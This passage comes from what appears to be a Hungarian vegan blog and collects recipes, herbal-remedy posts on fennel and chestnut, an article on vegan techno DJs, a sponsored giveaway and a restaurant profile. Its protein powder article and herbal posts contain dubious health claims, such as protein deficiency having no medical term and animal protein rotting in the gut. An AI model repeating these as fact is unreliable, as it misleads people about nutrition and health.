kicsit más a színe, mivel ebben a fűszerkeverékben a kurkumán kívül más fűszerek is vannak) - piros: a jó magyar pirospaprika - liláskék: acai bogyó (por alakban lehet hozzájutni, nagyon magas antioxidáns tartalma miatt egyre népszerűbb. Minősége miatt a PlanetBIO márkájú Acai port ajánlom) - világoszöld: búzafű vagy árpafű por (ezt is lehet már por alakban is kapni) - mélyzöld: spirulina alga por (magas tápértéke miatt egyre többen fogyasztják, keressünk olyan spirulinát, amiben egyáltalán nincs higany. Ilyen például a PlanetBIO spirulina algája) - apróra vágott zöldfűszerekkel fehér-zöld pöttyös gombócot kapunk - lehet keverni a sárgát és a pirosat, vagy a világos- és a sötétzöldet, vagy a megszínezett mandulasajtot meg lehet forgatni darabos fűszerkeverékben. A masszából kanállal egyforma nagyságú gombócokat szaggatunk, majd attól függően, hogy hány színünk lesz, és mennyi gombócunk, akár egyenként is belekeverhetjük a színező anyagot, akár több golyót összegyúrhatunk a fűszerrel, és újra jöhet a gombóc-készítés. Hagyjunk egy két gombócot fehéren is... az is egy szép szín A színes gombócok nem csak a színükben fognak különbözni, hanem mindnek más és más lesz az íze is. Vendégeink nem győzik majd kóstolgatni, felezgetni (hogy minél többeknek jusson belőle), és tanakodni, hogy vajon mi a titka a színeknek, ízeknek... találgatják majd :) :) :) . A gombócokat kínálhatjuk salátához, vagy csak úgy gúlába halmozva, szépen egymás tetején... Fotó: Birta Endre Tálaljuk salátával
Tofus görög saláta
A görög saláta a görögöknél olyan, mint a krumplileves a magyaroknál. Ahány ház, annyi szokás. A régi görögök a salátát az "istenek eledelének" nevezték. Hippokratész, az ókor leghíresebb orvosa, a táplálkozás fontos elemeként említi és dicséri a saláta egészségjavító hatását, 300 salátanövényt sorol fel írásaiban. Az ókori görögök szépségápolás céljából is fogyasztottak salátát. A görög monda úgy tartja, hogy a szerelem istennőjének, Aphroditénak kegyeltje, a szépséges Adonisz címerében saláta volt - az ókortól fogva hittek a saláta szépítő erejében. Mivel már akkor is szépek és egészségesek akartak lenni az emberek, rengeteg fejes salátát fogyasztottak. Színekben pompázó, feta helyett tofuval készült görög saláta recept következik. A recept: Hozzávalók: - 1 kígyóuborka - 2-3 paprika - 1 lilahagyma - 1 maréknyi (fekete) olívabogyó (szeletelt vagy magozott egész is jó) - 300 g tofu - igény esetén olíva olaj - igény esetén oreganó és/vagyy bazsalikom Elkészítés: Az uborkát, paprikát és a lila hagymát apró kockákra vágjuk. Kimagozzuk az olívabogyót, felszeleteljük, ha szükséges, és a többi zöldséghez keverjük. Kis kockákra vágjuk a tofut, és gyengéd mozdulatokkal átkeverjük. Szerintem a hagyma és a többi zöldség rövid idő alatt jól összeérik, a tofu eleve tartalmaz elegendő sót, tehát én semmit fűszert vagy olajat nem tartottam szükségesnek hozzátenni. Akinek nem elég finom, tehet hozzá. Paradicsomot is tehetünk bele.
Ropogós kiflik (vegán)
Egyik szombat este arról beszélgettünk férjemmel, hogy Angliában még nem nagyon láttunk kiflit. Zsömlét igen, de - érdekes módon - még lengyel vagy más kelet-európai élelmiszerboltokban sem találkoztunk kiflivel (nem pozsonyi kiflivel). Nem mintha Magyarországon annyira kiflin éltünk volna, ha vettem is, főként rozsost, vagy legalább magokban gazdag kifliket igyekeztem vásárolni. Ezen rövid társalgásunk után több sem kellett, minthogy másnap kora reggel ébredve nekiláttam a kiflikészítésnek. Így születtek meg a képen látható ropogós kiflik. A legelső kiflik a történelem során meglehetősen régen készültek. Mende-mondák szerint a 16. századi török harcok idején Wendler Péter bécsi sütőmester alkotta meg először a törökök félholdjára emlékeztető kifliket egyfajta fricskaként a törökök felé. (Persze a 16. század előtt is készülhettek már a kiflihez hasonlító portékák.) Azóta már sok átalakuláson mehetett át, esetemben puhaságát ropogósra cseréltem fel, lisztként pedig teljes kiőrlésű búzalisztet is használtam. A recept: Hozzávalók: - 1 csomag száraz porélesztő - 3 dl meleg növényi tej - 15 dkg teljes kiőrlésű liszt - 25 dkg fehér liszt (BL-55) - 6 dkg kókuszzsír vagy növényi margarin - 1 ek őrölt lenmag - 1 teáskanál só (nem púpozottan!) Elkészítés: Az élesztőt a keverőtálba szórjuk, majd ráöntjük a meleg növényi tejet. Amikor az élesztő feloldódott, hozzáadjuk a liszteket, a kókuszzsírt, őrölt lenmagot és a sót. Elsőnek fakanállal összekeverjük a tésztát, amennyire tudjuk, majd kezünkkel keverjük, dagasztjuk tovább. Ha szükséges, pár csepp vizet még adunk hozzá. Amikor összeállt a tészta, és a kezünkkel való dagasztás során már elválik az edény falától, akkor az edényt kicsit kilisztezzük, majd a tésztát letakarjuk, meleg helyen pihentetjük legalább 30 percet. Amikor a duplájára dagadt, lisztezett deszkán vagy munkaasztalon kinyújtjuk, háromszögekre felvágjuk s a háromszögek "talpánál" felcsavarjuk őket kiflikbe. Sütőpapíros vagy szilikonlapos tepsibe tesszük őket, megkenjük kevés vízzel és kb. 30 perc alatt megsütjük őket. Amikor kivesszük, még keménynek tűnnek, de ahogy kihűlnek, úgy lesznek ropogós kiflik.
Az édeskömény hatásai
2016. február 27. Élj harmóniában
Az édeskömény magot sokféle gyógyászati célra használják szerte a világon. A mag hatásairól írtam egy korábbi bejegyzésben itt olvashatod. Az édeskömény gumót kevesebben ismerik, mert Magyarországon nem igazán népszerű, de egy nagyon sokoldalú és egészséges zöldség. Nagyon ízletes, illatos, aromás, kicsit ánizsra emlékeztető aromával rendelkezik. Magas a rosttartalma, így kedvezően befolyásolja az emésztést, segít a táplálék továbbhaladását a belekben, így megakadályozza a székrekedést. Számos vitamint, nyomelemet tartalmaz ( B1-, B2-, B5-, B6-, C, kalcium, foszfor) Illóolaj tartalma serkenti az emésztést, megszünteti a puffadást, bélgörcsöket, hasfájást. Továbbá oldja a hurutot is. Az édeskömény enyhe vízhajtó hatással is rendelkezik, így a húgyutak tisztításában is jótékony. Az ájurvédában mindhárom dosha számára kedvezően hat. Vata, pitta, kapha diétába is jól beilleszthető. Felhasználhatod nyersen salátákba, készíthetsz belőle sült zöldséget, párolt zöldséget, sütőben is sütheted és levesbe is ízletes. Vegyszermentes (bio) édesköményt használj:)
Az édeskömény-mag hatásai
2016. február 18. Élj harmóniában
Az édeskömény magja egy nagyon jótékony gyógynövény és mindent ájurvédikus testtípus számára kedvező. Már az ókor óta ismert és szerencsére Magyarországon is egyre elterjedtebb a használata. Általánosságban véve hat az emésztésre, idegrendszerre és a húgyúti szervekre is,. Az egyik legkiválóbb hatása az emésztésre van. Erősíti a gyomrot, segíti az emésztést, növeli az emésztés tűzét (agni-t) Szélhajtó és görcsoldó hatású, csökkenti a hasi fájdalmakat. Emésztési panaszokra kisgyerekeknek és időseknek is alkalmazható. Pörkölve, akár étkezések után is fogyaszthatsz egy kiskanállal . Segít megszüntetni a kellemetlen szájszagot is. Segíti a vesék munkáját, vízhajtó hatású . Jól használható, amikor a vizelet égő érzéssel távozik. Szellemileg felfrissít és nyugtatja az idegeket Elősegíti a menstruációt és kedvezően befolyásolja a kismamák tejtermelését. Vegyszermentes (bio) változatot fogyassz :)
Vegán techno DJ-k
2016. február 11. Vegán lettem
Egyre több híresség áll vegán mozgalmak élére és tagadja meg a húst. Elektronikus zenei berkeken belül is vannak akik már letették a voksukat a nem ártás mellett. Ők a vegán techno DJ-k! Ha jártas vagy az elektronikus zenében és szereted a techno különböző szubstílusait, akkor valószínűleg nem kell bemutatnom neked az alábbi neveket. Magyarországon is ismert és közkedvelt művészek és zenészek gondolják úgy, hogy az állatoknak nem kell szenvedniük vagy meghalniuk a kényelmünk, megszokásaink és igényeink miatt. Ezen előadók saját facebook oldalukon belemennek néha nagyon komoly etikai vitákba és nem átalkodnak keményebben is odaszólni pár rosszindulatú radikális húsevőnek. A tapasztalat egyébként az, hogy még ha a többség nem is tud együtt lélegezni az általuk olvasottakkal, mégis nagyon kulturált eszmecsere szokott kialakulni. Vegán techno DJ Chris Liebing vegán techno DJ. Sőt, kiadója a CLR égisze alatt tevékenykedő zenészek közül ugyancsak sokan vannak aktív vegánok. Például a Technokunst által több ízben elhozott Tommy Four Seven, vagy az A38-on vendégeskedő Brian Sanhaji és Rebekah, valamint a Magyarországon kevésbé ismert Emerson. Rebekah egyébként az Electronic Beats-en adott már vegán tanácsokat, Liebing a The Traktor Cookery főzőműsorban - ahol rendszerint híres elektronikus zenészek kotyvasztanak – készített piszok jó vegán hamburger tálat, Brian Sanhaji pedig a facebook oldalán vezet egy külön mappát a saját maga által készített vegán kajáknak. A Drumcode vezér Adam Beyerrel folytatom a sort, aki ugyancsak vegán, azonban ő nem megy bele vitákba közösségi oldalán és nem is nagyon reklámozza vegánságát. Chris Liebing a The Traktor Cookery-ben A korai hardtechno-s holdudvarból megmaradt és aktív vegán techno DJ-k között is vannak olyanok, akiket számos esetben hallhattatok Magyarországon zenélni az NGOHT jóvoltából többek között. A két legismertebb talán a Pet Duo testvérpáros, akik állatjogi aktivisták vegán szcénán belül, valamint Frank Kvitta aki ugyancsak komoly radikálisnak számít a vegánok között. Frank Kvitta és Chris Liebing facebookon többször adtak már hangot együtt vegánságuknak: “vegan power because we love animals alive” Vegán techno DJ csajok is vannak. A svéd Ida Engberg – Adam Beyer felesége - is vegán. Született három csodálatos gyerekük, akiket ugyancsak vegánként nevelnek mindenféle probléma nélkül. Ida Engberg nem egyszer posztol vegán tartalmat, beleállva a vitákba. Végül, de nem utolsó sorban itt van Fernanda Martins vegán techno DJ hölgy, aki ugyancsak járt már Magyarországon a Corvin Clubban 2015 májusában. Adam Beyer és Ida Engberg Aztán ott van még a nagy öregek közül Josh Wink, aki ugyancsak szószólónak számít vegán körökben. De talán mindegyiknél híresebb vegán elektronikus zenész Moby, aki a KFC ellen egy vicces klipet forgatott a Disco Lies című zenéjéhez, erős mondanivalóval. Zárásnak ugyan nem vegán techno DJ következik, de mindenképpen ismert elektronikus zenei formáció. Die Antwoord megvan? A duóból Yolandi Visser vegán és híres a nagy balhéiról, melyet akkor ver ki különböző hotelekben, ahol ezt nem veszik komolyan. Egyébként van Magyarországon vegán techno rajongó csapat, akik mindig nagy lelkesedéssel fogadják a vegán techno DJ -ket. Megkeresik őket előre és készítenek nekik “vegan techno” feliratú pólókat, majd a bulikban odaadják nekik. A képen egyébként Tommy Four Seven látható, az egyik magyar vegan techno-s aktivistával.
Zöldséges-tofus kocsonya (vegán)
Korábban már készítettem zöldséges kocsonyát tofu nélkül és útifű-maghéjjal, most azonban a ReformTér idei főzőköre velem indult még január közepén (januárban Magyarországon voltunk), ahova agar-agar-ral készült vegán zöldséges kocsonyát (is) vittem, amibe füstölt tofut is tettem. A főzőköri szervírozásnál pedig citromkarikát tettünk a tetejére. Aki szeretné, citrom helyett édes vagy csípős fűszerpaprikával is megszórhatja. A következő mennyiségből nagyobb adag készült. Először is a főzőkörre, ahol jó sikere lett, másodszor édesanyámnak, aki szerintem utoljára kb. 25 éve evett kocsonyát, harmadszor egy kevés magunknak. Férjemnek nagyon ízlett. Szerintem is finom lett, mások szerint is, de én továbbra sem vagyok oda a kocsonyákért. (A gyümölcstorta-jellegű süteményeken sem igazán szeretem. Itt Angliában pedig meglehetősen gyakran találkozok kocsonyás édességekkel, süteményekkel a boltok polcain. Nem hoz lázba.) A recept: Hozzávalók: - 1 nagy bögre felkarikázott sárgarépa - 1 nagy bögre zöldborsó - 1 kisebb fej karfiol - 2 szál fehérrépa - 1 kisebb fej zeller - 1 kisebb fej karalábé - 3-4 szem krumpli - 1 hagyma - 5-6 gerezd fokhagyma - 1 kisebb csokor petrezselyem - kurkuma - ételízesítő - bio zöldség-leveskocka - füstölt tofu - agar-agar (1 teáskanál 1 literhez) Elkészítés: A megpucolt, megmosott, felaprított zöldségeket egy nagy fazékba tesszük, megszórjuk ételízesítővel és annyi vizet öntünk rá, hogy épp ellepje. Hozzáadunk leveskockát, kurkumát, majd a főzés utolsó pár percében fokhagymát egészben és szeletelve, valamint apróra vágott petrezselymet. Aki gondolja, egész fekete borsot is tehet bele. Én inkább filterbe/szűrőbe zárva főzöm bele az egész bors-szemeket. Ebből a mennyiségből egy jó adag zöldség leves lesz, amit nem érdemes egy az egyben kocsonyának felhasználni, főleg ha szeretjük a sűrű leveseket. Nos nálunk ez a helyzet, így kimentettem belőle némi levet és zöldséget egy másik lábosba. Ehhez kezdtem el hozzákeverni az agar-agar-t a következők szerint: Az agar-agarból kb. 1 evőkanálnyit elkeverünk 1 dl zöldséglével, majd ezt keverjük hozzá a többi kocsonya-alaphoz, és egyet forralunk rajta. Ezt követően már csak megfelelő edényekbe szervírozzuk, belerakjuk a felszeletelt füstölt tofut, lezárjuk és vagy kitesszük az erkélyre/udvarra/ablakpárkányra (ha elég hideg van), vagy hűtőben pihentetjük néhány (legalább 4) órát. Egy-két nap alatt azért érdemes elfogyasztani, ezért tanácsos meggondolni, mennyit készítünk belőle. UI: Még volt a fagyasztónkban medvehagyma, így azt is tettem bele.
Zöldésges rizsgombócok magyaros szósszal
Hemangi Dasi egyik receptje inspirált az elkészítésére, de az indiai ízeket kicseréltem magyarosra ;) Ígérem, nyáron azt is kipróbálom, mert nagyon nagyon guszta!!!! Ez is isteni finom lett, bátran ajánlom kipróbálásra ;) A recepteket t is vegyétek lazán. A gombócokhoz olyan zöldségeket tegyetek, ami épp van otthon, a magyaros szószt pedig ki-ki a saját szája […]
Vegán konzerv bableves 15 perc alatt, szupergyorsan
Üres a hűtőd és időd sincs főzni, de mégis tartalmas ebédre vágysz? A 15 perces vegán konzerv bableves tökéletes választás a rohanós időkre. Amikor idő szűkében vagy és a hűtőben sem találsz semmit, sokat segíthetnek a konzervek. Nem a legelegánsabb megoldás ugyan, de valóban gyors és megfelelő minőségű konzervekből is lehet nagyon sok finom vegán ételt készíteni. Személy szerint a vörös vesebabot magában, szendvics mellé, salátára feltétként is nagyon imádom, de egy gazdag, laktató leves, nálam sokszor egyedüli szereplője az ebédnek. Nagyjából 15 perc alatt készíthető el a vegán konzerv bableves, ami jól jön ha ugyan sietve, de egy kis meleg levesre vágysz. Vegán konzerv bableves hozzávalók 1 vörös (vese)bab konzerv (250g töltőtömegű – bonduelle) fél sárgarépa konzerv (130g töltőtömegű bébirépa konzerv – globus) fél fej vöröshagyma 1 gerezd fokhagyma 1 tk liszt (bármilyen, akár rizsliszt is megteszi) 1 ek napraforgóolaj 1 marék bulgur (helyettesíthető gerslivel, hajdinával, krumplival, vagy rizstésztával) 1 babérlevél 2 kk só és 1 kk bors 1kk kömény 1tk lestyán 1tk fehérborecet 1 negyed friss citrom leve póréhagyma zöld része 1 kis csokor friss petrezselyem Vegán konzerv bableves elkészítése A hagymát és fokhagymát kockázd fel, majd olajon pirítsd meg őket. Amikor a hagyma már kezd arany színezetet kapni, add hozzá a lisztet és sűrű kevergetés mellett pirítsd tovább, 1-2 perc múlva kevés vízzel keverd el a pirított lisztes hagymát. Ezzel készen is van a leves alapja, egy hagymás rántás. Add hozzá a rántáshoz az egész babkonzervet, a fél répakonzervet, a babérleveleket és a marék bulgurt. Kis vízzel öntsd fel és körülbelül 10 percig forrald. Add hozzá a fűszereket (só, bors, kömény, lestyán), majd add hozzá a borecetet és a negyed citrom levét, majd miután levetted a tűzről, szórd meg az apróra vágott póréhagymával és petrezselyemmel. Jó étvágyat kívánok! Jelmagyarázat: ek – evőkanál; tk – teáskanál; kk – kávéskanál
Rakott cékla tormaszósszal
A receptet szintén Gitta fotója ihlette, ami szokás szerint nagyon jó ötlet volt ;) Ebben a megfázásos, influenzás időszakban mindenkinek ajánlom. Mert a torma nem csak az orrodat “tisztíccsa”, de garantáltan kiírt minden bacit belőled ;) A céklasaláta pedig nem csak a magyar aloe vera, de nagyon nagyon finom ;) Egy biztos, ez után az […]
Vegán fehérjepor
Számos féle-fajta vegán fehérjepor található a boltokban. De melyik a jobb, és ha jobb miért jobb? Egyáltalán szüksége van a szervezetnek bármilyen fehérjeporra? Mindenekelőtt engedjétek meg, hogy pár általam hasznosnak vélt információval és gondolatmenettel bevezessem a vegán fehérjepor listát, melyet a cikk alján találtok. Miért vegán fehérjepor? Az állati fehérjék emésztése nem megy könnyedén a szervezet számára. Mivel teljesen rostmentes mindennemű állati táplálék, így az nehezíti és lassítja az emésztést, ráadásul a fel nem használt tápanyag gyors rothadásnak indul a belekben, mely folyamat olyan toxinokat szabadít fel, melyet összekötnek többek között a vastagbélrák kialakulásával. Ami még problémát jelent, hogy minél nagyobb mennyiségben vesz magához az ember rostmentes állati eredetű táplálékot, annál lassabbá válik az emésztés és annál hosszabb ideig szívódnak fel a rothasztó baktériumok által termelt toxinok. Ezt a helyzetet tovább súlyosbítja a mozgáshiány és az ülőmunka is. Az emberi bélrendszer hosszúsága sem a gyors fehérje emésztést támogatja, de erről bővebben a húsevő az ember című cikkemben írok. A tejmentes vegán fehérjepor előnye A fehérjeporok nagy százaléka tejből készül. Ami azért problémás, mivel sok ember érzékeny a tejben lévő, úgynevezett tejcukorra, a laktózra. Sőt, a tejben van egy kazein nevű fehérje, mely egy lassú felszívódású lánc és mely bezavarja gyorsfelszívódású fehérjék hasznosulását. A testépítők többek között a kazein miatt isszák inkább vízzel a fehérjeporokat, nem pedig tejjel. Visszatérve, a tejből készült fehérjeporok ugyan kis mennyiségben, de ugyanúgy tartalmaznak laktózt. Ezzel a kisebb mennyiséggel játszva megbirkózik a szervezet, de hosszútávon olyan néma allergiás mellékhatásai lehetnek, mint pl.: porallergia, illetve agresszív laktóz vagy akár tejérzékenység. Ilyen hosszútávú mellékhatással egy vegán fehérjepor sem rendelkezik. A vegán fehérjepor rosszabb felszívódást produkál? Sok helyről hallottam, hogy a szója alapú fehérjeporok sokkal rosszabb felszívódást produkálnak mint az állati eredetű fehérjeporok. Sajnos semmilyen erre vonatkozó tudományos írást nem találtam, úgyhogy ezt egyelőre nem tudom tényként kezelni. Mivel ezt az “urban legend”-et csak szója alapú fehérjeporokkal kapcsolatban hallottam, így az is kérdéses, hogy milyen hatékonysággal szívódik fel például a rizs, lenmag, zöldborsó vagy chia mag alapú vegán fehérjepor. Amint hiteles információt olvasok valahol ebben a témában, úgy kiegészítem a cikk eme bekezdését. Azonban nem javaslom a fehérjeporok szedését De miért? Egyszerűen fogalmazva nincs rá szükség. A felnőtt ember fehérjeigénye nagyon alacsony, és ez az igény a testépítőknél sem nő drasztikusan. Ami veszélyessé teszi a fehérjefogyasztást az az a tény, hogy túlzott fehérjefogyasztás terheli a veséket többek között. Ez alól nem kivétel a vegán fehérjepor sem, az is fehérje, és ha túlléped a maximális szintet, bizony az is terheli a vesédet. A WHO hivatalos publikációban közölte ezeket a számokat: egy felnőtt ember protein szükséglete 0,35g testsúly kilogrammonként; súlyzós edzés mellett ez mindösszesen 1,35g-ra növekszik testsúly kilogrammonként. Ezen számok az elhízott embereknél nem relevánsak. További, konkrétan a fehérjeigénnyel és az ételek fehérjetartalmával foglalkozó cikket hamarosan publikálok. Tisztán növényi alapú étrenddel bevihető az a fehérje mennyiség és minőség melyre a szervezetnek szüksége van. Emellett, hogy mennyire garantált a dobozon feltüntetett beltartalom és aminosav profil, azt is gyártója válogatja. Vannak egészen szép eredményeket hozó, és az ellenőrzéseken csúnyán elbukó gyártók egyaránt. Ebben a témában számos, főleg angol nyelvű tesztet lehet olvasni. Legvégül pedig engedj meg egy kérdést: Hallottál már valaha krónikus fehérjehiányról mint betegségről? Na és fehérjemérgezésről? A fehérjehiányra mint olyanra nincs orvosi terminológia. Az éhező országokban komplett tápanyag és fehérjehiány van, de az más. Mi nem éhezünk. A fehérjemérgezés azonban ismert és előszele lehet a vesekárosodásnak. Miért fontos tudni ezt? Mivel az emberi minimum fehérjeigény és a túlzott fehérjebevitel szintje között bizony nagyon vékony a határ és könnyen túlzásba lehet esni még növényi étrenddel is. Főleg, ha vegán fehérjepor is szerepel a napi étrendben. Ha ezek után mégis úgy döntesz, vagy indokoltnak látod, hogy bebiztosítod magad vegán fehérjeporból, akkor a következők közül tudsz választani: Tehát a következő vegán fehérjepor termékek kaphatóak a magyar piacon: AbsoRice vegán fehérjeporok – csokoládé, kapuccsínó, vanília, eper, kakaókrém ízesítésben Barna rizs fehérje (Naturize) Chia mag fehérjepor (Dragon Superfood) Kendermag Protein (Green Origins) Protein Smoothie (Meal Balance) RAW protein (Garden of life) – vanília, csokoládé, natúr Rizs fehérje (BioTech) – erdei gyümölcs, csokoládé-fahéj ízesítésben Szójafehérje izolátum (Dénes-Natura) Vegan Protein (Triplex) – áfonya, vanília, csokoládé ízesítésben Vegán Protein (Vegabond) – vaníliás, csokis, chai ízesítésben Vegan Protein Fusion (Peak) – natúr, csokoládé ízesítésben (A nevekre kattintva tudjátok megnézni a termékjellemzőket.)
A gesztenye hatásai
2015. december 28. Élj harmóniában
A téli esték egyik tipikus illata, a sült gesztenye illata. A gesztenyét Magyarországon leginkább sütve fogyasztják, de nagyon elterjedt a főzött gesztenyéből készült gesztenye püré is. Itthon nem annyira ismert a gesztenyeliszt használata, amiből fantasztikus süteményeket, kekszeket, palacsintákat készíthetünk. A gesztenye nagyon sok vitamint, nyomelemet és ásványi anyagot tartalmaz. (C, E és B vitaminok, kálium, magnézium, vas, réz, foszfor) A gesztenye javítja az erek rugalmasságát, erősíti az érfalakat. Magas az antioxidáns tartalma és energiával tölti fel a szerveztet. Csökkenti a gyulladást és vizesedést. Megfázásnál, hurutos betegségeknél is nagyon jótékony, segít a légzőszerveket egészségesen tartani. A népi gyógyászat hasmenésre is javasolja. Rosttartalmának köszönhetően javítja az emésztést és telítettség érzetet kelt. Vegyszermentes (bio) gesztenyét fogyassz!
Skiphop ajándék ajánló karácsonyra + Nyereményjáték és kedvezménykupon
2015. december 16. Zizi kalandjai
A Skip*Hop Magyarország felkérésére összeállítottam egy listát, hogy nekem melyek a kedvenc termékeim az idei kínálatból az üzletükből. Van köztük olyan, amit már egy ideje mi is használunk és nagyon elégedettek vagyunk vele. Tényleg szeretettel ajánlom a kiváló minőségű cuki termékeiket, amelyek örömet csalnak baba, gyerek, anya, apa arcára is. A bejegyzés végén pedig játék, egy valaki nyerhet egy SkipHop Zoo nagy tányért és egy SkipHop Zoo kulacsot. egy – SkipHop Alphabet Zoo Fa Építőkocka Játék Nagyon szeretjük a fa játékokat, sőt ezeket preferáljuk a műanyag játékokkal szemben. Ebben a készletben különböző méretű fa elemek, házak, kockák és háromszögek találhatóak. A kockákat át tudjuk alakítani házikóvá; ha egymásra helyezzük őket, akkor tornyot is építhetünk; vagy akár egy kis város is kirakható belőlük. A kockák tömör, kiváló minőségű fából készültek. Minden kockán más-más betű, szín, ill. állatka található, így könnyebben megtanulható az ábécé, valamint a színek és az állatok neve. kettő – SkipHop Zoo Uzsonnás Táska + Kulacs / Karácsonyi Pingvin Uzsonnás táskánk már van egy ideje, amelynek a belseje hőszigetelt, frissen tartja a benne tárolt ételt. Nagyon szeretjük használni, Ádinak nagy kedvence. Nagyon cuki ez a limitált szériás kimondottan téli, karácsonyi hangulatot árasztó pingvines szett, amelyben az uzsonnás táskához egy pingvines kulacs is jár! három – SkipHop Zoo Snack Tartó / Katicás Gömbölyű formájának köszönhetően könnyen meg tudják fogni a gyerekek is. Gumis belső fedele nem engedi kigurulni például a kölesgolyókat, szóval lehet rázni, dobálni, a nasi a helyén marad! Praktikus, akár játszótérre, akár sétálni megyünk; menet közben könnyen tudnak a gyerekek is majszolni a benne lévő nasiból. Többféle színben, állatformában kapható. négy – SkipHop Bőrönd / Kutya Nagyobb gyerekeknek (3 éves kortól) már ideális lehet egy saját, vicces, cuki gurulós bőrönd, ha a család utazni indul. Belepakolhatják saját kincseiket, meg néhány apróságot, amit anya is fontosnak gondol. A bőrönd elején található egy cipzáras zseb, az oldalán pedig egy hálós zseb az üdítő tárolására. Többféle színben, állatformában kapható. öt – SkipHop Úti Takaró / Bagoly Cuki és párnaként is használható ez a pihe-puha takaró. A nagyméretű puha plüss anyaga, meleget biztosít a gyerek számára. Praktikus, mert mosógépben mosható. Többféle színben, állatformában kapható. hat – SkipHop Zoo Sport Fém Kulacs / Bagoly Hidegen és melegen tartja a benne tárolt italt, de kialakításának köszönhetően nem fázik és nem süti meg a gyerek kezét. Tetejét felpattintva egy szívószálat találunk, amelynek segítségével könnyen tudnak inni a gyerekek. Űrtartalma 350 ml és mosogatógépben is mosható. Többféle színben, állatformában kapható. hét – SkipHop Zoo Tányér Szett / Panda Örök kedvencünk a tányér szett, amely egy ketté osztott nagy tányérból és egy mélytányérból áll. A két részre osztott tányér praktikus etetés közben, különböző színű és textúrájú ételeket könnyen el tudunk különíteni. A kis mélytányérból könnyű tálalni pépesebb ételeket vagy leveseket. Nagyon masszív anyagból készültek a tányérok, kialakításuk miatt nagyon stabilak. PVC-mentes, BPA mentes, ftalát-mentesek. A tányérok mosogatógépben moshatók, mikrohullámú sütőben nem használhatók. Többféle színben, állatformában kaphatók. nyolc – SkipHop Moby Csapvédő / Bálna A szülők és a gyermekek kedvence is, ez az aranyos bálna formájú csapvédő, mely segít a fürdés alatti balesetek megelőzésében. A csapvédő a kívánt méretre állítható, mindenféle csaphoz beállítható a rajta található szűkítő pánt segítségével. kilenc – SkipHop Plüss / Bagoly A bagoly nagy kedvence Ádinak, így nem csoda, hogy ezt a puha, ölelgetni való baglyot is feltettem a listára. Többféle színben, állatformában kapható. tíz – SkipHop Tároló Kocka / Majom A játékok elpakolása nagy feladat nálunk is, igyekszem példát mutatni ebben, hogy aztán Ádi engem másoljon. Egy ilyen majmos tárolóba öröm a pakolás, rend lesz pillanatok alatt. Erős vászon anyaga biztosítja a sokáig tartó használatot. Könnyen tisztítható. Amikor pedig nem használjuk, könnyen összecsukható. Többféle színben, állatformában kapható. ***** KEDVEZMÉNYES VÁSÁRLÁSI LEHETŐSÉG A ZIZI KALANDJAI OLVASÓINAK!!! A Skip*Hop Magyarország felajánlotta, hogy kedvezménykupont biztosít a Zizi kalandjai olvasóinak! Aki 2015. december 15 és 2015. december 31-e között vásárol SkipHop márkájú termékeket a Monkie oldaláról az 15% kedvezményben részesül (a végösszegből kerül levonásra). A kuponkód, amelyet megrendeléskor be kell írni a kedvezmény érvényesítéséhez: ZIZIKA15. A kedvezmény más akcióval nem összevonható! Ezenkívül, aki a Webox terminálok egyikébe kéri a csomagját 2015. december 18-ig, annak ingyen kiszállítják! Jó vásárlást mindenkinek! ***** NYEREMÉNYJÁTÉK!!! Nyeremény : közelgő karácsony alkalmából a Skip*Hop Magyarország felajánlott egy SkipHop Zoo nagy tányért és egy SkipHop Zoo kulacsot egy leendő szerencsés nyertesnek (aki kiválaszthatja az állatfigurát, amelyiket szeretné megkapni)! Menjetek fel a Monkie oldalára és írjátok meg ide a bejegyzés alá kommentben, hogy nektek melyik termék nyerte el leginkább a tetszéseteket az összes közül! Extra pontért (vagyis, hogy duplán bele kerüljetek a kalapba sorsoláskor) lehet lájkolni a Monkie és a Skip*Hop Magyarország Facebook oldalakat! Szabályok : Kérem, hogy az alábbi formula minden pontját töltsétek ki! Vagyis a lefelé mutató nyilakkal nyissátok meg az ablakokat és hajtsátok végre az apró feladatokat. Ha kommentáltatok a blogon, akkor utána a formulába klikkeljetek a szürke I commented! kockára, csak így érvényes a kommentetek. Ha még nem vagy ha már lájkoltátok a Facebook oldalakat, mindkét esetben klikk a kék Visit Us-ra a lájkok után. A játék 2015. december 15-től 2015. december 19-ig tart. Sorsolás a Rafflecopter szoftverrel. Eredményhirdetés 2015. december 20-án. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyereményt a Webox csomagautomatákban tudja majd átvenni a nyertes vagy a Monkie üzletében. a Rafflecopter giveaway
Kozmosz vegán étterem
2015. december 15. Vegán lettem
A vegán lettem blog “Hol egyek?” szekciójának első szereplője a Kozmosz vegán étterem. Van egy tündéri kis étterem az oktogontól nem messze, melyet egy tüneményes hölgy és a lánya vezet. Semmilyen csicsa, semmilyen sallang, békés atmoszféra, elfogadható árak és az én igényeimnek 100%-osan megfelelő kínálat és ízvilág. Ez a Kozmosz vegán étterem! Ági az étterem vezetője egy kedd estén látott vendégül az étteremben, hogy a megfelelő miliőben beszélgethessünk róluk és az étteremről, melyet 2014 áprilisában nyitottak. Ágiék körülbelül 2012 tavaszán váltak mindenevőből vegánná, átmenet nélkül. A Kozmosz vegán étterem ötlete abból az egyszerű megállapításból eredt, hogy nem tudtak elmenni szinte sehova enni. Nagyon kevés vegán barát étterem volt még akkor. Lányával gyorsan meghozták a döntést: “Éttermet szeretnék nyitni!” – mondta visszaemlékezve. Sok tervezés valamint keresés után megtalálták a megfelelő helyszínt, megkötötték a szerződést és pár hónappal később kinyitottak. Az étterem neve pár órás brainstorming után született meg. “Ez a szó jelenti nekünk az éttermet. Harmonikus, kiegyensúlyozott, békés. És még tudod mi Gyuri? A Káosz ellentéte. Ez a Kozmosz vegán étterem.” – mesélte Ági. A Kozmosz vegán étterem csapata Ahogy azt már említettem Ági és lánya vezeti az éttermet, azonban mit sem érne erőfeszítésük és munkájuk egy csapat nélkül. Náluk alapvető elvárás a vegetáriánus étrend. “Bárki jött hozzánk dolgozni, az egy idő után etikai vegán lett, és megtapasztalta a vegán étrend pozitív hatásait.” – mesélte mosolyogva Ági. Egyébként egészen kis létszámú csapattal dolgoznak annak ellenére, hogy még nem voltam úgy ott, hogy üres lett volna a ház. Házhozszállítással egyelőre nem foglalkoznak, mivel nincsen meg hozzá a humán erőforrás és teljesen biztos pénzügyi struktúra, azonban tervezik bevezetni ezt a szolgáltatást is. Ági egyébként minden nap a Kozmoszban landol mivel nincs olyan nap, hogy ne lenne feladat. Segíti a beosztottak munkáját, beszerző körútra megy, beszélget a vendékkel és beáll a konyhába is. A Kozmosz vegán étterem kínálata A Kozmosz abszolút étterem jellegű hely. Nincs kiszolgálás a pultnál 